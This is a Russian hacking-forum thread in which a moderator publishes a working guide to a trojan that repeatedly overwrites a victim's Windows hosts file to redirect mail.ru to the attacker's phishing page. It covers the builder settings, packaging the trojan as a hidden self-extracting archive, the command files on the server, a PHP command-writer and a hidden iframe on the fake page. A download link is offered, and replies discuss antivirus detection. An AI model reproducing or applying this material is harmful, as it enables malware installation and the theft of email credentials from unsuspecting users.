ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Множественная правка hosts
  #1  
Старый 19.12.2009, 10:25
Аватар для satana-fu
satana-fu
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
Провел на форуме:
2485155

Репутация: 719
Отправить сообщение для satana-fu с помощью ICQ
По умолчанию Множественная правка hosts

Статья первая, будете вы пинать или нет, меня абсолютно не волнует, так что вам полная свобода. Просто захотелось рассказать про метод взлома с множественной правкой hosts.

Просто я заметил что в сети каждый трой меняет хостс только один раз, то есть запустила жертва трой и все, больше она в почту не попадет пока не догадается очистить хостс. Это весьма неприятная процедура для взломщика, так как палится его выделенный айпи, да и база пополняется ненужными повторами паролей. Тогда и пришло в голову что мне нужен трой который меняет хостс столько раз, сколько мне нужно. Трой был написан (отдельное спасибо hacknick ) и полгода я от случая к случаю троем пользовался. Щас потребность давно отпала и решил скинуть его на паблик. Пусть пасется.


Трой состоит из двух частей
Основная часть:
hoster_bulder.exe - билдер
hoster.exe - сам пустой трой без настроек
helper.cab - файл настроек, создается билдером

командная часть (заливается на сервер для управления троем):
base.bsd - тут записывается база компов, зараженных троем
cmd - тут записываются команды для троя
hosts - сам файл хостс, на который мы и заменим файл hosts, находящийся на компе жертвы
log.txt - логи подключения троя к серверу за командами
killer.exe - убивает трой на машине жертвы, когда мы посчитаем, что он там больше не нужен

Итак начнем, для начала берем hosts и прописываем в нем свой айпи и домен
1.1.1.1 mail.ru

Далее заливаем на сервер с выделенным айпи командную часть файлов (base.bsd, cmd, hosts, log.txt, killer.exe ), например в папку hoster и в итоге наша командная часть находится по следующему адресу http://site.ru/hoster/

На короткое время мы закончили с командной частью, позже вернемся к ней еще, но щас мы будем настраивать трой.

Открываем hoster_bulder.exe и видим следующее окно



FTP address:- указываем полный фтп путь до папки hoster/ где у нас лежит файл cmd
User:- указываем логин
Password: - указываем фтп пароль (у некоторых фтп пароль и пароль в админку разные)
E-mail: - указываем почту человека, которому мы собираемся трой всучить, это будет идентификатор(имя) троя, например siski@mail.ru


Нажимаем Configure и билдер создает файл настроек троя helper.cab

Далее выделяем мышкой helper.cab и hoster.exe , выбираем Добавить в архив



1. вкладка Общее - ставим галочку на пункт Создать SFX архив
2. вкладка Дополнительно - нажимаем на Параметры SFX



В открывшемся окне настраиваем следующие параметры:
1. вкладка Общее - в поле Выполнить после распаковки указываем hoster.exe
2. вкладка Режимы - ставим галочку в Скрыть все
3. вкладка Текст и графика - выбираем Загрузить значок из файла, берем отсюда иконки и выбираем иконку для нашего троя.

Нажимаем дважды Ок. Трой готов.

Далее идем на сервер и в файле cmd прописываем следующую команду
PHP код:
change('siski@mail.ru','hosts'
Эту команду трой выполнит, как только будет запущен. То есть он возьмет hosts с нашего сервера и закачает его жертве в папку C:\WINDOWS\system32\drivers\etc\ заменив тот, который находится там.

Теперь создаем на сервере в папке hoster следующий файл change.php cо следующим содержимым
PHP код:
<?PHP 
$text 
"change('siski@mail.ru','hosts')"
$filelog fopen("cmd","a+"); 
fwrite($filelog,"\n $text \n");  
fclose($filelog); ?>
и проставляем файлу cmd права 777

Закачиваем фейк на сервер и прописываем в теле фейка следующий фрейм
PHP код:
 <iframe width=1 height=1 style="position: absolute; visibility: hidden;" src="http://site.ru/hoster/change.php"></iframe
То есть как только жертва запустит трой. он выполнит команду из файла cmd и сменит hosts. Как только мы увидим что команда выполнена (файл cmd будет пустым, а в log.txt будет время последнего подключения троя к серверу), мы очищаем hosts на сервере от нашего айпи и идем спать.

Жертва набирает майл.ру например и попадает на наш фейк в котором мы прописали фрейм
PHP код:
<iframe width=1 height=1 style="position: absolute; visibility: hidden;" src="http://site.ru/hoster/change.php"></iframe
Фрейм запустится и запишет для троя команду в cmd снова сменить hosts, но уже на наш очищенный от айпишников. Время выполнения троем команды 6 минут. Этого времени достаточно чтоб жертва ввела на нашем фейке свой пароль. Через 6 минут hosts сменится на чистый и жертва как обычно будет юзать майл.ру и hosts будет чистым.

Если вы решили убить трой на машине жертвы, то прописываем в cmd следующую команду:
PHP код:
killme('siski@mail.ru','killer.exe'

Надеюсь все изложил понятно. Cтатья первая. На днях будет еще одна по взлому почты на www.pochta.ru с использованием баги на сайте.
Cкачать весь архив можно тут (пароль: antichat.ru)
или тут (пароль: antichat)

Надеюсь хоть для кого то статья будет полезна.
Что непонятно, спрашивайте.

С уважением Satana-fu.

Последний раз редактировалось satana-fu; 30.04.2010 в 05:21.. Причина: исправил ссылки
 
Ответить с цитированием

  #2  
Старый 20.12.2009, 19:22
Аватар для warwar
warwar
Участник форума
Регистрация: 26.05.2009
Сообщений: 219
Провел на форуме:
1646625

Репутация: 110
Отправить сообщение для warwar с помощью ICQ
По умолчанию

актуальна по моему только для XP
 
Ответить с цитированием

  #3  
Старый 20.12.2009, 23:43
Аватар для cupper
cupper
Постоянный
Регистрация: 06.06.2007
Сообщений: 575
Провел на форуме:
1180737

Репутация: 180


По умолчанию

а твой трой антивирями уже палиться ?
 
Ответить с цитированием

  #4  
Старый 21.12.2009, 00:18
Аватар для x3r0x
x3r0x
Новичок
Регистрация: 06.05.2007
Сообщений: 11
Провел на форуме:
65891

Репутация: 0
По умолчанию

Некоторые антивирусы палят сам факт изменения файла hosts
 
Ответить с цитированием

  #5  
Старый 21.12.2009, 00:28
Аватар для qaKEP
qaKEP
Познающий
Регистрация: 25.09.2008
Сообщений: 56
Провел на форуме:
346344

Репутация: 38
Отправить сообщение для qaKEP с помощью ICQ
По умолчанию

Цитата:
Сообщение от x3r0x  
Некоторые антивирусы палят сам факт изменения файла hosts
Напривер касперыч.
Вопрос: Почему имено хостс? Ведь гуголяшко и яндекс ответят нубу на его ламерский вопрос, не рассматривал вариант через подмену DNS ? Через изменение пути к файлу хостс (реестр) + очистка настроек DNS? - не уверен, не тестил, редирект вроде не будет работать.
Ну в общем то за свот спасибо, молодец, если не трудно, отправь в личку ссыль на сорцы, будет лично полезно. Заранеее спасибо!
 
Ответить с цитированием

  #6  
Старый 21.12.2009, 00:50
Аватар для satana-fu
satana-fu
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
Провел на форуме:
2485155

Репутация: 719
Отправить сообщение для satana-fu с помощью ICQ
По умолчанию

Цитата:
Сообщение от cupper  
а твой трой антивирями уже палиться ?
месяц назад кажется трой палился только файерволом нортона, и то палится не трой, а сам путь распаковки троя, если его распаковывать их sfx архива, каспером вроде не палился, щас утверждать не берусь.



Цитата:
Сообщение от qaKEP  
Напривер касперыч.
Вопрос: Почему имено хостс? Ведь гуголяшко и яндекс ответят нубу на его ламерский вопрос, не рассматривал вариант через подмену DNS ? Через изменение пути к файлу хостс (реестр) + очистка настроек DNS? - не уверен, не тестил, редирект вроде не будет работать.
Ну в общем то за свот спасибо, молодец, если не трудно, отправь в личку ссыль на сорцы, будет лично полезно. Заранеее спасибо!


не расматривал, поищу на компе сорцы и скину как нибудь

Последний раз редактировалось satana-fu; 21.12.2009 в 00:54..
 
Ответить с цитированием

  #7  
Старый 21.12.2009, 07:55
Аватар для ~Shapaev~
~Shapaev~
Новичок
Регистрация: 24.10.2009
Сообщений: 26
Провел на форуме:
306200

Репутация: 10
По умолчанию

Цитата:
Сообщение от warwar  
актуальна по моему только для XP
Да нет , я писал для 7ки хостс троян и работало все , но такой какой попроще , просто дописывал в конец файла.
 
Ответить с цитированием

  #8  
Старый 21.12.2009, 10:24
Аватар для gibson
gibson
Moderator - Level 7
Регистрация: 24.02.2006
Сообщений: 447
Провел на форуме:
2872049

Репутация: 705
Отправить сообщение для gibson с помощью ICQ
По умолчанию

Цитата:
Сообщение от warwar  
актуальна по моему только для XP
актуально для всех версий винды, потому что сначала хост смотрится по записям из этого файла.
 
Ответить с цитированием

  #9  
Старый 21.12.2009, 10:35
Аватар для svesve
svesve
Постоянный
Регистрация: 15.06.2007
Сообщений: 527
Провел на форуме:
1734541

Репутация: 214


По умолчанию

Насколько я понял он не универсален, ибо надо каждому прописывать свое мыло?? верно??

Да исходничики было бы не плохо глянуть ну и для чисток само собой.
а так ++++++

Последний раз редактировалось svesve; 21.12.2009 в 10:40..
 
Ответить с цитированием

  #10  
Старый 21.12.2009, 19:52
Аватар для satana-fu
satana-fu
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
Провел на форуме:
2485155

Репутация: 719
Отправить сообщение для satana-fu с помощью ICQ
По умолчанию

Цитата:
Сообщение от svesve  
Насколько я понял он не универсален, ибо надо каждому прописывать свое мыло?? верно??

Да исходничики было бы не плохо глянуть ну и для чисток само собой.
а так ++++++
нет, можно трой с айди siski скинуть, например, 10 жертвам и команда выполнится всеми 10 сразу, можно каждому отдельно скинуть с универсальным айди, и каждым троем управлять отдельно, в этом случае гемора с командами больше, но контролировать удобнее.

исходники скину позже и в личку.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Next Hosts Antiabuse Service - самые вкусные цены! NextAbHost Разное - Покупка, продажа, обмен 12 10.01.2010 23:38
Альтернативный блокиратор Hosts! (mazila,ie,opera) Whois Разное - Покупка, продажа, обмен 17 10.11.2009 19:01
Правка hosts, что бы АВ не палили. vasy1980-8 О Работе 19 13.10.2009 15:04



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ